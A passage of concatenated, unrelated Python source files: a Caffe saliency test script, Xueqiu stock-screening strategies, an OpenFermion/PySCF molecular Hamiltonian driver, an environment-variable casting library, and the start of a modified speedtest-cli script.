for ch in range(prob_trimmed.shape[0]):
prob_tmp = scipy.misc.imresize(prob[ch], [input_padded_size, input_padded_size], mode='F')
prob_tmp = prob_tmp[margins[0]:margins[0] + H, margins[2]:margins[2] + W]
prob_trimmed[ch] = scipy.misc.imresize(prob_tmp, [H_original, W_original], mode='F')
return prob_trimmed
def run_test(net, out_dir, control, conf):
year = '20' + control['test_dataset'][3:5]
pascal_list = get_pascal_indexlist(conf['pascalroot'], year, control['test_datatype'], control['test_dataset'][5:],
shuffle=conf['shuffle'], n=conf['n'], N=conf['N'])
num_test = len(pascal_list)
print('%d images for testing' % num_test)
transformer = set_preprocessor_without_net(
[1, 3, conf['input_padded_size'], conf['input_padded_size']],
mean_image=np.array([104.008, 116.669, 122.675],
dtype=np.float))
pred_list = []
id_list = []
start_time = time.time()
for idx in range(num_test):
end_time = time.time()
print (' Iter %d took %2.1f seconds' % (idx, end_time - start_time))
start_time = time.time()
print (' Running %d out of %d images' % (idx + 1, num_test))
inst = idx
im_id = pascal_list[inst]
outfile = osp.join(out_dir, im_id + '.mat')
if conf['save_heat']:
if not conf['overridecache']:
if osp.isfile(outfile):
print('skipping')
continue
imloc = os.path.join(conf['pascalroot'], 'VOC' + year, 'JPEGImages', im_id + '.jpg')
image = load_image_PIL(imloc)
imshape_original = image.shape[:2]
input_image, margins, factor, H, W = process_test_input(image, transformer, conf['input_padded_size'])
prob = net_forward(net, input_image)
prob = process_test_output_prob(prob, margins, imshape_original[0], imshape_original[1], H, W,
conf['input_padded_size'], factor)
sal = 255 * prob[1] / prob[1].max()
if conf['vis']:
def visualise_data():
fig = plt.figure(0, figsize=(15, 10))
fig.suptitle('ID:{}'.format(im_id))
ax = fig.add_subplot(1, 2, 1)
ax.set_title('Original image')
pim(image)
ax = fig.add_subplot(2, 2, 2)
ax.set_title('Saliency prediction')
ax.imshow(sal, cmap="hot", clim=(0, 255))
ax = fig.add_subplot(2, 2, 4)
ax.imshow(image)
ax.imshow(sal, alpha=.5, cmap="hot", clim=(0, 255))
for iii in range(3):
fig.axes[iii].get_xaxis().set_visible(False)
fig.axes[iii].get_yaxis().set_visible(False)
plt.pause(1)
return
visualise_data()
if conf['save_heat']:
if not conf['overridecache']:
assert (not os.path.isfile(outfile))
else:
if os.path.isfile(outfile):
print('WARNING: OVERRIDING EXISTING RESULT FILE')
sio.savemat(outfile, dict(heatmap=sal, imshape_original=imshape_original))
print('results saved to %s' % outfile)
return
def crawl_net(conf):
testproto = osp.join('data', EXP_PHASE, 'deploy.prototxt')
learnedmodel = osp.join('data', EXP_PHASE, 'weights.caffemodel')
caffe.set_mode_gpu()
caffe.set_device(conf['gpu'])
net = caffe.Net(testproto, learnedmodel, caffe.TEST)
return net
def main(control, conf):
control, control_token, conf = config_test(control, conf, EXP_PHASE)
out_dir = osp.join('cache', EXP_PHASE, create_token(control_token))
mkdir_if_missing(out_dir)
print('saving to: {}'.format(out_dir))
net = crawl_net(conf)
run_test(net, out_dir, control, conf)
if __name__ == '__main__':
if len(sys.argv) != 1:
control, conf = parse_input(sys.argv)
main(control, conf)
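# Hedged usage sketch (not part of the original script; the filename below is a
# placeholder). The flags mirror parse_input above:
#   python saliency_test.py --net DeepLabv2_ResNet --dataset MSRA --datatype NP \
#       --test_dataset voc12val --test_datatype Segmentation \
#       --pascalroot /path/to/VOC --gpu 0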
|
|
from xueqiu_api import XueqiuApi
class XueqiuStrategies(object):
@staticmethod
def stable_strict():
stable = XueqiuApi('stable_strict')
stable.append_pettm('0', '15')
stable.append_pb()
stable.append_dy()
stable.append_roediluted('20161231', '15', is_order_by_this=True)
stable.append_roediluted('20151231', '15')
stable.append_roediluted('20141231', '15')
stable.append_roediluted('20131231', '15')
stable.append_roediluted('20121231', '15')
stable.append_roediluted('20111231', '12')
stable.append_roediluted('20101231', '10')
stable.append_roediluted('20091231', '10')
stable.append_income_grow('20161231')
stable.append_income_grow('20151231')
stable.append_income_grow('20141231')
stable.append_income_grow('20131231')
stable.append_income_grow('20121231')
stable.append_income_grow('20111231')
stable.append_income_grow('20101231')
stable.append_income_grow('20091231')
stable.append_profie_grow('20161231')
stable.append_profie_grow('20151231')
stable.append_profie_grow('20141231')
stable.append_profie_grow('20131231')
stable.append_profie_grow('20121231')
stable.append_profie_grow('20111231')
stable.append_profie_grow('20101231')
stable.append_profie_grow('20091231')
stable.append_gross('20161231')
stable.append_gross('20151231')
stable.append_gross('20141231')
stable.append_gross('20131231')
stable.append_gross('20121231')
# stable.append_gross('20111231')
# stable.append_gross('20101231')
# stable.append_gross('20091231')
stable.append_interest('20161231')
stable.append_interest('20151231')
stable.append_interest('20141231')
stable.append_interest('20131231')
stable.append_interest('20121231')
# stable.append_interest('20111231')
# stable.append_interest('20101231')
# stable.append_interest('20091231')
return stable
@staticmethod
def stable_short():
stable = XueqiuApi('stable_short')
stable.append_pettm('0', '30')
stable.append_pb()
stable.append_dy()
stable.append_pct_rate(start='-50', end='30')
stable.append_roediluted('20161231', '15', is_order_by_this=True)
stable.append_roediluted('20151231', '15')
stable.append_roediluted('20141231', '15')
stable.append_roediluted('20131231', '1')
stable.append_roediluted('20121231', '1')
stable.append_roediluted('20111231', '1')
stable.append_income_grow('20161231')
stable.append_income_grow('20151231')
stable.append_income_grow('20141231')
stable.append_income_grow('20131231')
stable.append_income_grow('20121231')
stable.append_income_grow('20111231')
stable.append_profie_grow('20161231')
stable.append_profie_grow('20151231')
stable.append_profie_grow('20141231')
stable.append_profie_grow('20131231')
stable.append_profie_grow('20121231')
stable.append_profie_grow('20111231')
stable.append_gross('20161231')
stable.append_gross('20151231')
stable.append_gross('20141231')
stable.append_gross('20131231')
stable.append_gross('20121231')
stable.append_gross('20111231')
stable.append_interest('20161231')
stable.append_interest('20151231')
stable.append_interest('20141231')
stable.append_interest('20131231')
stable.append_interest('20121231')
stable.append_interest('20111231')
return stable
@staticmethod
def stable():
stable = XueqiuApi('stable')
stable.append_pettm('0', '20')
stable.append_pb()
stable.append_dy()
stable.append_roediluted('20161231', '15', is_order_by_this=True)
stable.append_roediluted('20151231', '15')
stable.append_roediluted('20141231', '15')
stable.append_roediluted('20131231', '15')
stable.append_roediluted('20121231', '15')
stable.append_roediluted('20111231', '12')
stable.append_roediluted('20101231', '10')
stable.append_roediluted('20091231', '10')
stable.append_income_grow('20161231')
stable.append_income_grow('20151231')
stable.append_income_grow('20141231')
stable.append_income_grow('20131231')
stable.append_income_grow('20121231')
stable.append_income_grow('20111231')
stable.append_income_grow('20101231')
stable.append_income_grow('20091231')
stable.append_profie_grow('20161231')
stable.append_profie_grow('20151231')
stable.append_profie_grow('20141231')
stable.append_profie_grow('20131231')
stable.append_profie_grow('20121231')
stable.append_profie_grow('20111231')
stable.append_profie_grow('20101231')
stable.append_profie_grow('20091231')
stable.append_gross('20161231')
stable.append_gross('20151231')
stable.append_gross('20141231')
stable.append_gross('20131231')
stable.append_gross('20121231')
# stable.append_gross('20111231')
# stable.append_gross('20101231')
# stable.append_gross('20091231')
stable.append_interest('20160930')
stable.append_interest('20151231')
stable.append_interest('20141231')
stable.append_interest('20131231')
stable.append_interest('20121231')
# stable.append_interest('20111231')
# stable.append_interest('20101231')
# stable.append_interest('20091231')
return stable
@staticmethod
def stable_slow():
stable = XueqiuApi('stable_slow')
stable.append_pettm('0', '20')
stable.append_pb()
stable.append_dy()
stable.append_roediluted('20161231', '15', is_order_by_this=True)
stable.append_roediluted('20151231', '15')
stable.append_roediluted('20141231', '15')
stable.append_roediluted('20131231', '15')
stable.append_roediluted('20121231', '12')
stable.append_roediluted('20111231', '10')
# stable.append_roediluted('20101231', '10')
# stable.append_roediluted('20091231', '8')
stable.append_income_grow('20160930')
stable.append_income_grow('20151231')
stable.append_income_grow('20141231')
stable.append_income_grow('20131231')
stable.append_income_grow('20121231')
stable.append_income_grow('20111231')
stable.append_income_grow('20101231')
stable.append_income_grow('20091231')
stable.append_profie_grow('20160930')
stable.append_profie_grow('20151231')
stable.append_profie_grow('20141231')
stable.append_profie_grow('20131231')
stable.append_profie_grow('20121231')
stable.append_profie_grow('20111231')
stable.append_profie_grow('20101231')
stable.append_profie_grow('20091231')
stable.append_gross('20160930')
stable.append_gross('20151231')
stable.append_gross('20141231')
stable.append_gross('20131231')
stable.append_gross('20121231')
# stable.append_gross('20111231')
# stable.append_gross('20101231')
# stable.append_gross('20091231')
stable.append_interest('20160930')
stable.append_interest('20151231')
stable.append_interest('20141231')
stable.append_interest('20131231')
stable.append_interest('20121231')
# stable.append_interest('20111231')
# stable.append_interest('20101231')
# stable.append_interest('20091231')
return stable
@staticmethod
def faster_short():
fast = XueqiuApi('faster_short')
fast.append_pettm('0', '25')
fast.append_pb()
fast.append_dy()
fast.append_roediluted('20161231', '18', is_order_by_this=True)
fast.append_roediluted('20151231', '18')
fast.append_roediluted('20141231', '10')
fast.append_roediluted('20131231')
fast.append_roediluted('20121231')
fast.append_income_grow('20161231', '7')
fast.append_income_grow('20151231', '7')
fast.append_income_grow('20141231', '7')
fast.append_income_grow('20131231')
fast.append_income_grow('20121231')
fast.append_profie_grow('20161231', '12')
fast.append_profie_grow('20151231', '12')
fast.append_profie_grow('20141231', '12')
fast.append_profie_grow('20131231')
fast.append_profie_grow('20121231')
fast.append_gross('20161231')
fast.append_gross('20151231')
fast.append_gross('20141231')
fast.append_gross('20131231')
fast.append_gross('20121231')
fast.append_interest('20161231')
fast.append_interest('20151231')
fast.append_interest('20141231')
fast.append_interest('20131231')
fast.append_interest('20121231')
return fast
@staticmethod
def fast():
fast = XueqiuApi('fast')
fast.append_pettm('0', '25')
fast.append_pb()
fast.append_dy()
fast.append_roediluted('20161231', '15', is_order_by_this=True)
fast.append_roediluted('20151231', '15')
fast.append_roediluted('20141231', '15')
fast.append_roediluted('20131231')
fast.append_roediluted('20121231')
fast.append_roediluted('20111231')
fast.append_roediluted('20101231')
fast.append_roediluted('20091231')
fast.append_income_grow('20161231', '5')
fast.append_income_grow('20151231', '5')
fast.append_income_grow('20141231', '5')
fast.append_income_grow('20131231')
fast.append_income_grow('20121231')
fast.append_income_grow('20111231')
fast.append_income_grow('20101231')
fast.append_income_grow('20091231')
fast.append_profie_grow('20161231', '10')
fast.append_profie_grow('20151231', '10')
fast.append_profie_grow('20141231', '10')
fast.append_profie_grow('20131231')
fast.append_profie_grow('20121231')
fast.append_profie_grow('20111231')
fast.append_profie_grow('20101231')
fast.append_profie_grow('20091231')
fast.append_gross('20161231')
fast.append_gross('20151231')
fast.append_gross('20141231')
fast.append_gross('20131231')
fast.append_gross('20121231')
# fast.append_gross('20111231')
# fast.append_gross('20101231')
# fast.append_gross('20091231')
fast.append_interest('20161231')
fast.append_interest('20151231')
fast.append_interest('20141231')
fast.append_interest('20131231')
fast.append_interest('20121231')
# fast.append_interest('20111231')
# fast.append_interest('20101231')
# fast.append_interest('20091231')
return fast
@staticmethod
def faster():
fast = XueqiuApi('faster')
fast.append_pettm('0', '25')
fast.append_pb()
fast.append_dy()
fast.append_roediluted('20161231', '15', is_order_by_this=True)
fast.append_roediluted('20151231', '15')
fast.append_roediluted('20141231', '15')
fast.append_roediluted('20131231')
fast.append_roediluted('20121231')
fast.append_roediluted('20111231')
fast.append_roediluted('20101231')
fast.append_roediluted('20091231')
fast.append_income_grow('20161231', '7')
fast.append_income_grow('20151231', '7')
fast.append_income_grow('20141231', '7')
fast.append_income_grow('20131231')
fast.append_income_grow('20121231')
fast.append_income_grow('20111231')
fast.append_income_grow('20101231')
fast.append_income_grow('20091231')
fast.append_profie_grow('20161231', '12')
fast.append_profie_grow('20151231', '12')
fast.append_profie_grow('20141231', '12')
fast.append_profie_grow('20131231')
fast.append_profie_grow('20121231')
fast.append_profie_grow('20111231')
fast.append_profie_grow('20101231')
fast.append_profie_grow('20091231')
fast.append_gross('20161231')
fast.append_gross('20151231')
fast.append_gross('20141231')
fast.append_gross('20131231')
fast.append_gross('20121231')
# fast.append_gross('20111231')
# fast.append_gross('20101231')
# fast.append_gross('20091231')
fast.append_interest('20161231')
fast.append_interest('20151231')
fast.append_interest('20141231')
fast.append_interest('20131231')
fast.append_interest('20121231')
# fast.append_interest('20111231')
# fast.append_interest('20101231')
# fast.append_interest('20091231')
return fast
@staticmethod
def fastest():
fast = XueqiuApi('fastest')
fast.append_pettm('0', '30')
fast.append_pb()
fast.append_dy()
fast.append_roediluted('20161231', '15', is_order_by_this=True)
fast.append_roediluted('20151231', '15')
fast.append_roediluted('20141231', '10')
fast.append_roediluted('20131231')
fast.append_roediluted('20121231')
fast.append_roediluted('20111231')
fast.append_roediluted('20101231')
fast.append_roediluted('20091231')
fast.append_income_grow('20161231', '10')
fast.append_income_grow('20151231', '10')
fast.append_income_grow('20141231', '10')
fast.append_income_grow('20131231')
fast.append_income_grow('20121231')
fast.append_income_grow('20111231')
fast.append_income_grow('20101231')
fast.append_income_grow('20091231')
fast.append_profie_grow('20161231', '18')
fast.append_profie_grow('20151231', '18')
fast.append_profie_grow('20141231', '18')
fast.append_profie_grow('20131231')
fast.append_profie_grow('20121231')
fast.append_profie_grow('20111231')
fast.append_profie_grow('20101231')
fast.append_profie_grow('20091231')
fast.append_gross('20161231')
fast.append_gross('20151231')
fast.append_gross('20141231')
fast.append_gross('20131231')
fast.append_gross('20121231')
# fast.append_gross('20111231')
# fast.append_gross('20101231')
# fast.append_gross('20091231')
fast.append_interest('20161231')
fast.append_interest('20151231')
fast.append_interest('20141231')
fast.append_interest('20131231')
fast.append_interest('20121231')
# fast.append_interest('20111231')
# fast.append_interest('20101231')
# fast.append_interest('20091231')
return fast
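# Hedged usage sketch (not part of the original module): each factory method
# returns a XueqiuApi instance configured with the filters above. How the query
# is actually executed depends on XueqiuApi, which is not shown here.
if __name__ == '__main__':
    screener = XueqiuStrategies.stable()
    print(screener)  # default repr only; the real query call is API-specific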
|
|
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Driver to initialize molecular object from pyscf program."""
from __future__ import absolute_import
from functools import reduce
import numpy
from pyscf import gto, scf, ao2mo, ci, cc, fci, mp
from openfermion import MolecularData
from openfermionpyscf import PyscfMolecularData
def prepare_pyscf_molecule(molecule):
"""
    This function builds a pyscf molecule (gto.Mole) from a MolecularData instance.
Args:
molecule: An instance of the MolecularData class.
Returns:
pyscf_molecule: A pyscf molecule instance.
"""
pyscf_molecule = gto.Mole()
pyscf_molecule.atom = molecule.geometry
pyscf_molecule.basis = molecule.basis
pyscf_molecule.spin = molecule.multiplicity - 1
pyscf_molecule.charge = molecule.charge
pyscf_molecule.symmetry = False
pyscf_molecule.build()
return pyscf_molecule
def compute_scf(pyscf_molecule):
"""
    Set up a Hartree-Fock calculation (ROHF for open-shell molecules, RHF
    otherwise). The SCF itself is run by the caller.
Args:
pyscf_molecule: A pyscf molecule instance.
Returns:
pyscf_scf: A PySCF "SCF" calculation object.
"""
if pyscf_molecule.spin:
pyscf_scf = scf.ROHF(pyscf_molecule)
else:
pyscf_scf = scf.RHF(pyscf_molecule)
return pyscf_scf
def compute_integrals(pyscf_molecule, pyscf_scf):
"""
Compute the 1-electron and 2-electron integrals.
Args:
pyscf_molecule: A pyscf molecule instance.
pyscf_scf: A PySCF "SCF" calculation object.
Returns:
one_electron_integrals: An N by N array storing h_{pq}
two_electron_integrals: An N by N by N by N array storing h_{pqrs}.
"""
# Get one electrons integrals.
n_orbitals = pyscf_scf.mo_coeff.shape[1]
one_electron_compressed = reduce(numpy.dot, (pyscf_scf.mo_coeff.T,
pyscf_scf.get_hcore(),
pyscf_scf.mo_coeff))
one_electron_integrals = one_electron_compressed.reshape(
n_orbitals, n_orbitals).astype(float)
# Get two electron integrals in compressed format.
two_electron_compressed = ao2mo.kernel(pyscf_molecule,
pyscf_scf.mo_coeff)
two_electron_integrals = ao2mo.restore(
1, # no permutation symmetry
two_electron_compressed, n_orbitals)
# See PQRS convention in OpenFermion.hamiltonians._molecular_data
# h[p,q,r,s] = (ps|qr)
two_electron_integrals = numpy.asarray(
two_electron_integrals.transpose(0, 2, 3, 1), order='C')
# Return.
return one_electron_integrals, two_electron_integrals
def run_pyscf(molecule,
run_scf=True,
run_mp2=False,
run_cisd=False,
run_ccsd=False,
run_fci=False,
verbose=False):
"""
This function runs a pyscf calculation.
Args:
molecule: An instance of the MolecularData or PyscfMolecularData class.
run_scf: Optional boolean to run SCF calculation.
run_mp2: Optional boolean to run MP2 calculation.
run_cisd: Optional boolean to run CISD calculation.
run_ccsd: Optional boolean to run CCSD calculation.
        run_fci: Optional boolean to run FCI calculation.
verbose: Boolean whether to print calculation results to screen.
Returns:
molecule: The updated PyscfMolecularData object. Note the attributes
of the input molecule are also updated in this function.
"""
# Prepare pyscf molecule.
pyscf_molecule = prepare_pyscf_molecule(molecule)
molecule.n_orbitals = int(pyscf_molecule.nao_nr())
molecule.n_qubits = 2 * molecule.n_orbitals
molecule.nuclear_repulsion = float(pyscf_molecule.energy_nuc())
# Run SCF.
pyscf_scf = compute_scf(pyscf_molecule)
pyscf_scf.verbose = 0
pyscf_scf.run()
molecule.hf_energy = float(pyscf_scf.e_tot)
if verbose:
print('Hartree-Fock energy for {} ({} electrons) is {}.'.format(
molecule.name, molecule.n_electrons, molecule.hf_energy))
# Hold pyscf data in molecule. They are required to compute density
# matrices and other quantities.
molecule._pyscf_data = pyscf_data = {}
pyscf_data['mol'] = pyscf_molecule
pyscf_data['scf'] = pyscf_scf
# Populate fields.
molecule.canonical_orbitals = pyscf_scf.mo_coeff.astype(float)
molecule.orbital_energies = pyscf_scf.mo_energy.astype(float)
# Get integrals.
one_body_integrals, two_body_integrals = compute_integrals(
pyscf_molecule, pyscf_scf)
molecule.one_body_integrals = one_body_integrals
molecule.two_body_integrals = two_body_integrals
molecule.overlap_integrals = pyscf_scf.get_ovlp()
# Run MP2.
if run_mp2:
if molecule.multiplicity != 1:
print("WARNING: RO-MP2 is not available in PySCF.")
else:
pyscf_mp2 = mp.MP2(pyscf_scf)
pyscf_mp2.verbose = 0
pyscf_mp2.run()
# molecule.mp2_energy = pyscf_mp2.e_tot # pyscf-1.4.4 or higher
molecule.mp2_energy = pyscf_scf.e_tot + pyscf_mp2.e_corr
pyscf_data['mp2'] = pyscf_mp2
if verbose:
print('MP2 energy for {} ({} electrons) is {}.'.format(
molecule.name, molecule.n_electrons, molecule.mp2_energy))
# Run CISD.
if run_cisd:
pyscf_cisd = ci.CISD(pyscf_scf)
pyscf_cisd.verbose = 0
pyscf_cisd.run()
molecule.cisd_energy = pyscf_cisd.e_tot
pyscf_data['cisd'] = pyscf_cisd
if verbose:
print('CISD energy for {} ({} electrons) is {}.'.format(
molecule.name, molecule.n_electrons, molecule.cisd_energy))
# Run CCSD.
if run_ccsd:
pyscf_ccsd = cc.CCSD(pyscf_scf)
pyscf_ccsd.verbose = 0
pyscf_ccsd.run()
molecule.ccsd_energy = pyscf_ccsd.e_tot
pyscf_data['ccsd'] = pyscf_ccsd
if verbose:
print('CCSD energy for {} ({} electrons) is {}.'.format(
molecule.name, molecule.n_electrons, molecule.ccsd_energy))
# Run FCI.
if run_fci:
pyscf_fci = fci.FCI(pyscf_molecule, pyscf_scf.mo_coeff)
pyscf_fci.verbose = 0
molecule.fci_energy = pyscf_fci.kernel()[0]
pyscf_data['fci'] = pyscf_fci
if verbose:
print('FCI energy for {} ({} electrons) is {}.'.format(
molecule.name, molecule.n_electrons, molecule.fci_energy))
# Return updated molecule instance.
pyscf_molecular_data = PyscfMolecularData.__new__(PyscfMolecularData)
pyscf_molecular_data.__dict__.update(molecule.__dict__)
pyscf_molecular_data.save()
return pyscf_molecular_data
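# Hedged usage sketch (not part of the original driver): run SCF and CCSD for H2
# in a minimal basis; geometry, basis and multiplicity are illustrative choices.
#   h2 = MolecularData([('H', (0., 0., 0.)), ('H', (0., 0., 0.7414))],
#                      'sto-3g', multiplicity=1, charge=0)
#   h2 = run_pyscf(h2, run_scf=True, run_ccsd=True)
#   print(h2.hf_energy, h2.ccsd_energy)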
def generate_molecular_hamiltonian(
geometry,
basis,
multiplicity,
charge=0,
n_active_electrons=None,
n_active_orbitals=None):
"""Generate a molecular Hamiltonian with the given properties.
Args:
geometry: A list of tuples giving the coordinates of each atom.
An example is [('H', (0, 0, 0)), ('H', (0, 0, 0.7414))].
Distances in angstrom. Use atomic symbols to
specify atoms.
basis: A string giving the basis set. An example is 'cc-pvtz'.
Only optional if loading from file.
multiplicity: An integer giving the spin multiplicity.
charge: An integer giving the charge.
n_active_electrons: An optional integer specifying the number of
electrons desired in the active space.
n_active_orbitals: An optional integer specifying the number of
spatial orbitals desired in the active space.
Returns:
The Hamiltonian as an InteractionOperator.
"""
# Run electronic structure calculations
molecule = run_pyscf(
MolecularData(geometry, basis, multiplicity, charge)
)
# Freeze core orbitals and truncate to active space
if n_active_electrons is None:
n_core_orbitals = 0
occupied_indices = None
else:
n_core_orbitals = (molecule.n_electrons - n_active_electrons) // 2
occupied_indices = list(range(n_core_orbitals))
if n_active_orbitals is None:
active_indices = None
else:
active_indices = list(range(n_core_orbitals,
n_core_orbitals + n_active_orbitals))
return molecule.get_molecular_hamiltonian(
occupied_indices=occupied_indices,
active_indices=active_indices)
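# Hedged usage sketch (not part of the original driver): build the Hamiltonian
# for the docstring's H2 geometry, optionally restricting to an active space.
#   geometry = [('H', (0, 0, 0)), ('H', (0, 0, 0.7414))]
#   hamiltonian = generate_molecular_hamiltonian(
#       geometry, 'sto-3g', multiplicity=1,
#       n_active_electrons=2, n_active_orbitals=2)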
|
|
from __future__ import unicode_literals, print_function
import os
import sys
import logging
import json
from decimal import Decimal, InvalidOperation
try:
import urllib.parse as urlparse
except ImportError:
import urlparse
try:
from django.core.exceptions import ImproperlyConfigured
except ImportError:
class ImproperlyConfigured(Exception):
"""Configuration Exception
Imported from Django if available, otherwise defined as
a simple subclass of Exception
"""
pass
try:
from django.utils.six import string_types
except ImportError:
if sys.version_info[0] == 3:
string_types = (str,)
text_type = str
else:
string_types = (basestring,)
text_type = unicode
__version__ = '0.1.1'
NOTSET = type(str('NoValue'), (object,), {})
logger = logging.getLogger(__name__)
class Environment(object):
"""Class for reading and casting environment variables
This class presents the main interface for interacting with the
environment. Once instantiated, it can either be called as a function,
or any of the convenience methods can be used.
Args:
environ (`dict`): Environment to read variables from
"""
_collections = (dict, list, set, tuple)
_lists = (list, set, tuple)
def __init__(self, environ):
self.environ = environ
def __call__(self, var, default=NOTSET, cast=None, force=True):
"""Function interface
Once the environment has been initialised, it can be called as a
function. This is necessary to provide custom casting, or it can
sometimes be preferred for consistency.
Examples:
Casting an environment variable:
>>> env = Environment({'MY_VAR': '1'})
>>> env('MY_VAR', cast=int)
1
Providing a default:
>>> env = Environment({})
            >>> env('ANOTHER_VAR', default='value')
            'value'
Args:
var (`str`): The name of the environment variable
default: The value to return if the environment variable does not
exist
cast: type or function for casting environment variable. See
casting
force (`bool`): Whether to force casting of the default value
Returns:
The environment variable if it exists, otherwise default
Raises:
ImproperlyConfigured
"""
return self._get(var, default=default, cast=cast, force=force)
def __contains__(self, var):
"""Test if an environment variable exists
Allows using the ``in`` operator to test if an environment variable
exists.
Examples:
>>> env = Environment({'MY_VAR': '1'})
>>> 'MY_VAR' in env
True
>>> 'ANOTHER_VAR' in env
False
"""
return var in self.environ
# Simple builtins
def bool(self, var, default=NOTSET, force=True):
"""Convenience method for casting to a bool"""
return self._get(var, default=default, cast=bool, force=force)
def float(self, var, default=NOTSET, force=True):
"""Convenience method for casting to a float"""
return self._get(var, default=default, cast=float, force=force)
def int(self, var, default=NOTSET, force=True):
"""Convenience method for casting to an int"""
return self._get(var, default=default, cast=int, force=force)
def str(self, var, default=NOTSET, force=True):
"""Convenience method for casting to a str"""
return self._get(var, default=default, cast=text_type, force=force)
# Builtin collections
def tuple(self, var, default=NOTSET, cast=None, force=True):
"""Convenience method for casting to a tuple
Note:
Casting
"""
return self._get(var, default=default, cast=(cast,), force=force)
def list(self, var, default=NOTSET, cast=None, force=True):
"""Convenience method for casting to a list
Note:
Casting
"""
return self._get(var, default=default, cast=[cast], force=force)
def set(self, var, default=NOTSET, cast=None, force=True):
"""Convenience method for casting to a set
Note:
Casting
"""
return self._get(var, default=default, cast={cast}, force=force)
def dict(self, var, default=NOTSET, cast=None, force=True):
"""Convenience method for casting to a dict
Note:
Casting
"""
return self._get(var, default=default, cast={str: cast}, force=force)
# Other types
def decimal(self, var, default=NOTSET, force=True):
"""Convenience method for casting to a decimal.Decimal
Note:
Casting
"""
return self._get(var, default=default, cast=Decimal, force=force)
def json(self, var, default=NOTSET, force=True):
"""Get environment variable, parsed as a json string"""
return self._get(var, default=default, cast=json.loads, force=force)
def url(self, var, default=NOTSET, force=True):
"""Get environment variable, parsed with urlparse/urllib.parse"""
return self._get(var, default=default, cast=urlparse.urlparse,
force=force)
# Private API
def _get(self, var, default=NOTSET, cast=None, force=True):
# Find the value in the environ
# If the value is missing, use the default or raise an error
try:
value = self.environ[var]
except KeyError:
if default is NOTSET:
msg = "Set the environment variable '{}'".format(var)
raise ImproperlyConfigured(msg)
else:
value = default
        # Cast the value if:
        # 1. it differs from the default, or
        # 2. casting is forced and the default is not None
if (value != default) or (force and default is not None):
value = self._cast(var, value, cast)
return value
def _cast(self, var, value, cast):
if cast is None:
pass
elif cast is bool:
if not isinstance(value, bool):
if value is True or value.lower() == 'true':
value = True
elif value is False or value.lower() == 'false':
value = False
else:
msg = ("Environment variable '{}' could not be parsed "
"as bool: value {} must be 'true' or 'false'")
raise ImproperlyConfigured(msg.format(var, value))
elif cast is int:
# Allow _ as separators to increase legibility
if isinstance(value, string_types):
value = value.replace('_', '')
try:
value = int(value)
except ValueError as e:
msg = ("Environment variable '{}' could not be parsed "
"as int: {}")
raise ImproperlyConfigured(msg.format(var, str(e)))
elif cast is float:
# Allow _ as separators to increase legibility
if isinstance(value, string_types):
value = value.replace('_', '')
try:
value = float(value)
except ValueError as e:
msg = ("Environment variable '{}' could not be parsed "
"as float: {}")
raise ImproperlyConfigured(msg.format(var, str(e)))
elif cast is Decimal:
try:
value = Decimal(value)
except InvalidOperation:
msg = ("Environment variable '{}' could not be parsed "
"as Decimal: {}")
raise ImproperlyConfigured(msg.format(var, value))
elif cast in self._lists:
if isinstance(value, self._lists):
value = cast(value)
elif isinstance(value, string_types):
parts = value.split(',')
value = cast([p.strip() for p in parts if p.strip()])
else:
msg = "Cannot cast environment variable '{}' from {} to {}"
formatted = msg.format(var, type(value), type(cast))
raise ImproperlyConfigured(formatted)
elif isinstance(cast, self._lists):
if len(cast) != 1:
msg = ("Cast for environment variable '{}' is not valid: "
"cast must be a {} of length 1")
raise ImproperlyConfigured(msg.format(var, type(cast)))
# Convert to a list, since sets do not support indexing
icast = list(cast)[0]
if (icast in self._collections or
isinstance(icast, self._collections)):
msg = ("Cast for environment variable '{}' is not valid: "
"It is not possible to cast to nested collections")
raise ImproperlyConfigured(msg.format(var))
parts = self._cast(var, value, type(cast))
value = type(cast)([self._cast(var, p, icast) for p in parts])
elif cast is dict:
if isinstance(value, dict):
pass
elif isinstance(value, string_types):
parts = [i.strip() for i in value.split(',') if i.strip()]
items = [p.split('=', 1) for p in parts]
value = {k.strip(): v.strip() for k, v in items}
else:
msg = "Cannot cast environment variable '{}' from {} to {}"
formatted = msg.format(var, type(value), type(cast))
raise ImproperlyConfigured(formatted)
elif isinstance(cast, dict):
if len(cast) != 1:
msg = ("Cast for environment variable '{}' is not valid: "
"cast must be a dict of length 1")
raise ImproperlyConfigured(msg.format(var))
keycast, valcast = list(cast.items())[0]
if (keycast in self._collections or
isinstance(keycast, self._collections) or
valcast in self._collections or
isinstance(valcast, self._collections)):
msg = ("Cast for environment variable '{}' is not valid: "
"It is not possible to cast to nested collections")
raise ImproperlyConfigured(msg.format(var))
parts = self._cast(var, value, dict)
value = {self._cast(var, k, keycast): self._cast(var, v, valcast)
for k, v in parts.items()}
else:
try:
value = cast(value)
except Exception as e:
msg = ("Cast for environment variable '{}' could not "
"be parsed: {}")
raise ImproperlyConfigured(msg.format(var, str(e)))
return value
# Export an initialized environment for convenience
env = Environment(os.environ)
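# Hedged usage sketch (not part of the original module), following the casting
# rules in Environment._cast above:
if __name__ == '__main__':
    demo = Environment({'HOSTS': 'a.example, b.example', 'LIMITS': 'cpu=2, mem=512'})
    print(demo.list('HOSTS'))             # ['a.example', 'b.example']
    print(demo.dict('LIMITS', cast=int))  # {'cpu': 2, 'mem': 512}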
|
|
#! /Users/Nest/anaconda/bin/python
# -*- coding: utf-8 -*-
# Copyright 2012-2014 Matt Martz
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import math
import os
import re
import signal
import socket
import sys
import threading
import time
import timeit
# These are things that I added
import pandas as pd
__version__ = '0.3.2'
# Some global variables we use
user_agent = 'speedtest-cli/%s' % __version__
source = None
shutdown_event = None
# Used for bound_interface
socket_socket = socket.socket
# Make some lists to hold upload and download speed values
download = []
upload = []
# Default for isp_name in case the branch in speedtest() that sets it is skipped
# (e.g. when --simple is passed); the DataFrame code at the bottom reads it.
isp_name = ''
try:
import xml.etree.cElementTree as ET
